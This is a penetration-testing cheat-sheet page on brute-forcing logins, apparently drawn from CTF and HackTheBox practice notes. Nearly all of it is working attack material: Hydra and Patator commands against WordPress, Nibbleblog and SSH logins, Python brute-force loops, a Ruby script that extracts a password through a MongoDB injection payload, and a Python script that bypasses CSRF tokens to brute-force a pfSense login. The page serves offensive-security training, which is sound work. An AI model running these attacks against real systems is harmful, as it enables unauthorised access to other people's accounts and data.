Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Hydra Brute Force
  • Trim your wordlist
  • Patator
  • Python Brute Force Starter Script:
  • Python Brute Loop:
  • Ruby Brute Loop
  • Brute CSRF Python

Was this helpful?

  1. 05 Passwords & Ciphers

Hydra Brutes

PreviousGet HashesNextImages Exif Steg

Last updated 2 years ago

Was this helpful?

Hydra Brute Force

  • If login attempts give an "Invalid Username"

  • We can Brute-Force based on this error

  • You could use for the keywords first (if you need it)

  • Wordlist (common passwords)

    • /usr/share/dirb/wordlists/common.txt

    • 10k_most_common.txt ..faster than rockyou, but decent!

    • .. SecLists/Passwords/Leaked-Databases/rockyou.txt

    • .. SecLists/Passwords/twitter-banned.txt ..small list of good pws

---------------------------
wordpress/blog
> hydra -vV -L users.dic -p wedontcare 192.x.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:=Invalid username"
> hydra -vV -l admin -P dict.txt -f -t 2 10.x.x.x http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect"
> hydra -vV -l admin -P /usr/share/wordlists/rockyou.txt -f -t 64 10.x.x.x http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"
---------------------------

web-form-login
> hydra -t 1 -l admin -P common.txt -vV http-get://192.x.x.x/admin
> hydra -t 1 -l admin -P rockyou.txt -vV http-get://192.x.x.x/nibbleblog/admin.php

---------------------------
ssh
hydra -L users.txt -P pass.txt ssh://10.x.x.x

-t 64  ..if you want to speed up threads  !!!!

Trim your wordlist

  • Example: Pull everything with 'nibble' in the word and.. try ONLY these

grep -i nibble /opt/.../rockyou.txt > mydict.txt

Patator

patator http_fuzz url="http://10.10.10.43/department/login.php"
method=POST body='username=admin&password=FILE0' 0=rockyou.txt 
follow=1 accept_cookie=1 
-x ignore:fgrep='Invalid Password!'
-x quit:fgrep='Hi admin'

patator http_fuzz url="https://10.10.10.43/db/index.php"
method=POST body='password=FILE0&login=Log+In&proc_login=true' 0=rockyou.txt 
follow=1 accept_cookie=1 
-x ignore:fgrep='Incorrect password.' 
-x quit:fgrep='test'

Python Brute Force Starter Script:

sudo apt-get install python
sudo apt-get install python-pip
pip install requests

import requests as rq
req = rq.get("http://xyz.com/login.php?pass=1234")
print(req.text)

Python Brute Loop:

import requests as rq
for i in range(1300,99999):
    req = rq.get("http://xyz.com/login.php?pass="+str(i))
    if "Wrong pass" in req.text:
        print("Attempt #%d" % i)
    else:
        print("\n\nSuccess!\nPassword: %d" % i)
        break

Ruby Brute Loop

  • Test every letter to see if it matches the 'first' letter/set

--------------------
Goal:
5b317d17-3ee3-4865-8605-bb579f58c10a

--------------------
Loop every digit:
a
b
c
ca
cb
cc

--------------------
Need 'httparty' module
>> sudu gem install httparty
>> vi expl.rb

--------------------
require 'httparty'
URL="mymongo.com"
def check?(str)
  resp = HTTParty.get("http://#{URL}/?search=admin' %26%26 this.password.match(/^#{str}/)%00")
  return resp.body=~ />admin</
end
#puts check?("5").inspect
#puts check?("a").inspect
CHARSET = ('a'..'z').to_a+('0'..'9').to_a+['-']
password = ""

while true
  CHARSET.each do |c|
	puts "Trying: #{c} for #{password}"
	test = password+c
	if check?("^#{test}.*$")
	  password+=c
	  puts password
	  break
	  end
  end
end

--------------------
Note:
^5       ..starts with 5
>admin<  ..used this b/c success page had this tag with >< marks
"5" and "aaa" as yes/no examples

Brute CSRF Python

  • Scrape the page and get the csrf token

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import re
re_csrf = 'csrfMagicToken = *(.*?)*'
s = requests.session()
lines = open('passwords.txt')
for password in lines:
    r = s.post('http://127.0.0.1/index.php')
    csrf = re.findall(re_csrf, r.text)[0]
    login = {'__csrf_magic': csrf, 'usernamefld': 'rohit', 'passwordfld': password[:-1], 'login': 'login'}
    r = s.post('http://127.0.0.1/index.php', data=login)
    if 'Dashboard' in r.text:
        print("Valid Login %s:%s" % ("rohit", password[:-1]))
    else:
        print("Failed")
        s.cookies.clear()
#print(r.text)
#print(csrf)

execute:
python3 bf-pf.py

REF:

REF: ,

Also:

REF:

Ruby Script for passwords on

REF: SenseHTB ippsec,

Burp
Fuzzing
Wordpress
pfsense
PythonBase64Loop
SSHBrutePatator
DictsListsMangling
MongoDBInjection